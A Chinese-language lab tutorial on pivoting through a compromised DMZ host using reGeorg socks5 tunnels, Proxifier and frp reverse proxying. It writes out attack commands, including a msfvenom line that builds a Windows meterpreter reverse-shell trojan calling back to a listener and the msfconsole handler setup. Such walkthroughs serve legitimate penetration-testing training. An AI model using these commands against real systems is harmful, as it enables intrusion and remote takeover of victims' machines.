赞
踩
正向代理有三个角色
攻击者拿下一台失陷主机发现这台失陷主机有两块网卡,下一步上传自己的内网扫描工具,比如fscan,或者自己写的一些主机存活检测脚本
扫描之后发现另一台内网主机20.1.1.2,这台主机开启了一些445的危险端口,可以尝试永恒之蓝等漏洞的时候,但是攻击主机无法直接联通这台内网主机,我们就没办发使用msf工具进行攻击,总不能上传一个msf工具到这台失陷主机吧?那也太蠢了,此时就需要在失陷主机上配置进行正向代理(socks5),配置好以后就可以直接在攻击机访问内网主机
socks5提供代理服务,各种编程语言自带socks5服务,只需要编辑几行代码就可以搭建起socks5服务,直接上传编辑好的脚本就可以开启服务
首先上传socks5脚本到失陷主机,作为scoks5的服务端,攻击机开启socks5的客户端,当攻击机10.1.1.1想访问内网主机20.1.1.2的时候,通过socks5代理转发到内网主机20.1.1.2
其实就和我们常用的工具BurpSuite一样,只不过BurpSuite在我们本地,没有放在失陷主机上
在我们做渗透测试或者红蓝对抗的时候,有些公司的一些资产会放到内网里面,我们不能直接访问到,此时就需要配置socks5
DMZ失陷主机两块网卡,一块nat模式。一块仅主机模式
内网主机一块仅主机模式网卡
失陷主机ip
内网主机ip
失陷主机可以访问内网主机
攻击机不能访问内网主机
攻击机可以访问失陷主机
脚本放到失陷主机根目录下
攻击机访问失陷主机的该文件,出现改样式,访问成功
输入
python reGeorgSocksProxy.py -p 8080 -u http://10.4.7.130/tunnel.nosocket.php
小狐狸插件中设置
开启代理访问10.1.1.2
以上是通过github的脚本配置正向代理
还可以使用Proxifier来进行配置
先配置服务器选项
输入本地127.0.0.1:8080
新建规则
远程桌面连接尝试
成功
有很多时候会连接不上,可能是python脚本或者虚拟机环境版本不够稳定
反向代理是失陷主机无法直接联通攻击主机,可以借助另一台可以直接访问攻击机的失陷主机来联通
在拿到内网权限横向移动之后拿到一台主机,此台主机无法直接联通我的处于内网的攻击机,此时使用反向代理进行连接
用nat模式模拟内网,用桥接模拟公网ip
环境:
一台桥接的dmz主机 172.20.10.2
一台nat的kali主机 10.4.7.138
真实机作为kali主机的服务器 172.20.10.13
kali开启frp客户端,真实机开启frp服务端
服务端配置文件不用更改,客户端配置文件修改为真实机启动frps
kali启动frpc
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.13 LPORT=6789 -f exe -o test.exe
此前配置文件将反向代理流量抓发到6789端口,我们使用msf工具开启监听
- msfconsole
-
- set payload windows/meterpreter/reverse_tcp
-
- set LHOST 127.0.0.1
-
- set LPORT 6789
-
- run
将生成的木马放到dmz主机,点击,查看kali连接成功
反向代理成功
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。